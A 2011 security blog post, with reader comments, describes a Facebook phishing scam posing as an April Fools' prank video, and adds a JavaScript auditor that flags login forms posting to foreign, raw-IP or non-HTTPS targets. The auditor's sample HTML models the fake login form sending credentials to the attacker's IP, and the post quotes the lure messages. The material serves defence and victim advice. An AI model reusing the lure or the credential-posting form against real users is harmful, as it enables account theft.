Facebook April Fools' Prank Phishing Passwords

From Mary Landesman, About.com Guide. April 4, 2011

A scam disguised as an April Fools' prank video is stealing Facebook usernames and passwords from victims. The scam also automatically "likes" the bogus video so that a message similar to the following appears on the victim's Facebook wall:

Video: This is the best April Fools' prank ever!
cotyperfume.info
Damn, that was so unexpected! Freaking awesome

When one of their Facebook friends clicks the cotyperfume.info link, it redirects to http://apps.facebook.com/aprilfoolsprank/. When they try to view the video, unbeknownst to them the page is really loading a malicious JavaScript from the attacker's server (173.231.144.82). The script displays a popup that reads:

Not Logged In
Please log in to continue.

If the victim clicks login, the script renders a bogus Facebook login page on the same http://apps.facebook.com/aprilfoolsprank/ page. When the user enters their Facebook username and password, the fake form posts the credentials to log.php on the attacker-owned server. (This is plain credential phishing rather than clickjacking: the form is visible and the user types into it deliberately; it simply submits somewhere other than Facebook.) The following message may also be displayed:

Please re-enter your password
The password you entered is incorrect. Please try again (make sure your caps lock is off).
Forgot your password?

Clicking "Forgot your password?" links to another file on the attacker-owned server, /recover.php?email_or_phone=addressremoved%40yahoo.com (the email address has been removed for this blog post). That file has since been taken down, so it is not known what would have happened next, but it is interesting to see an email address so visibly exposed. Whether the address actually belongs to the attacker or comes from a hijacked email account is also unknown.

Meanwhile, the attackers have also silently forced the user to "like" the video, so a message now appears on their wall telling all their friends:

Video: This is the best April Fools' prank ever!
cotyperfume.info
Damn, that was so unexpected! Freaking awesome

Oh, and the video that was supposedly so "freaking awesome"? There isn't one. The attackers just embedded a picture of a blank screen on the page.
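The tell in this scam is that a "Facebook" login form sitting on an apps.facebook.com page submits to a raw IP address over plain HTTP. The following is an added example, not code from the original post and not the attacker's script: it audits every form containing a password field against the page it lives on and reports cross-origin, IP-literal, non-HTTPS and unknown-host submit targets. The page URL, the form action and the HTML snippet are constructed from the description above; the allow-list of login hosts is an assumption for illustration.

```javascript
// Added example: audit where a page's login forms send credentials.
// Not the attacker's code; URLs and HTML below are constructed from the post.

// Assumed allow-list of hosts a Facebook login form may legitimately post to.
const TRUSTED_LOGIN_HOSTS = ["facebook.com"];

function hostMatches(host, allowed) {
  return allowed.some((a) => host === a || host.endsWith("." + a));
}

function isIpLiteral(host) {
  // IPv4 dotted quad, or a bracketed IPv6 literal as the URL parser renders it.
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.startsWith("[");
}

// Compare one form's submit target with the page it is embedded in.
// Returns an array of human-readable findings; empty means nothing suspicious.
function auditLoginForm(pageUrl, formAction) {
  const page = new URL(pageUrl);
  const target = new URL(formAction, pageUrl); // relative actions resolve against the page
  const findings = [];
  if (target.origin !== page.origin) {
    findings.push("cross-origin: form posts to " + target.origin + " from " + page.origin);
  }
  if (isIpLiteral(target.hostname)) {
    findings.push("target is a raw IP literal: " + target.hostname);
  }
  if (target.protocol !== "https:") {
    findings.push("credentials would travel over " + target.protocol.replace(":", ""));
  }
  if (!hostMatches(target.hostname, TRUSTED_LOGIN_HOSTS)) {
    findings.push("target host " + target.hostname + " is not a known login host");
  }
  return findings;
}

// Extract the action of every <form> that contains a password field.
// A regex is adequate for this constructed sample; a real page should be
// walked with a DOM parser (document.querySelectorAll("form") in a browser).
function findCredentialForms(html) {
  const actions = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    if (!/type\s*=\s*["']?password/i.test(body)) continue;
    const action = /action\s*=\s*["']([^"']*)["']/i.exec(attrs);
    actions.push(action ? action[1] : "");
  }
  return actions;
}

function scanPage(pageUrl, html) {
  return findCredentialForms(html).map((action) => ({
    action,
    findings: auditLoginForm(pageUrl, action),
  }));
}

// Constructed sample modelled on the post: a fake login form injected into the
// app page, posting to log.php on the attacker's server, next to a harmless form.
const PAGE_URL = "http://apps.facebook.com/aprilfoolsprank/";
const SAMPLE_HTML = `
<div id="video"><img src="blank.png" alt=""></div>
<form id="fakelogin" method="post" action="http://173.231.144.82/log.php">
  <input name="email" type="text">
  <input name="pass" type="password">
  <input type="submit" value="Log In">
</form>
<form action="/search"><input name="q" type="text"></form>
`;

for (const result of scanPage(PAGE_URL, SAMPLE_HTML)) {
  console.log(result.action, result.findings.length ? result.findings : ["no findings"]);
}
```

Run under Node (the URL class is a global), or paste the two audit functions into a browser console and feed them `location.href` and each form's `action`. For the sample above the fake form trips all four checks, while a form that posts to https://www.facebook.com/ from that same host produces none.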

What to Do if You Were a Victim
If you were a victim of the Facebook April Fools' phishing scam, you need to change your Facebook password immediately. If you used the same password for your email account, you will need to change that as well.

Comments
April 4, 2011 at 1:59 pm
(1) David :

This happened to me…what am I supposed to do now? Change my password? Thank you for your help.

David

April 4, 2011 at 3:09 pm
(2) antivirus :

Hi David,

Sorry – I should have included that info in the blog post. Yes, you should change your Facebook password. And if you used the same password for email, you need to change it there as well. I updated the blog post to include this – thanks for the reminder!

– Mary

April 4, 2011 at 3:59 pm
(3) Schleppy :

If you have HTTPS enabled for your Facebook account you will get a warning when you click this link. Thankfully I have it enabled and declined viewing the link after seeing the warning.

April 16, 2011 at 9:57 pm
(4) Mr Adam Smolkowicz :

hey thanks for the heads up

Adam Smolkowicz
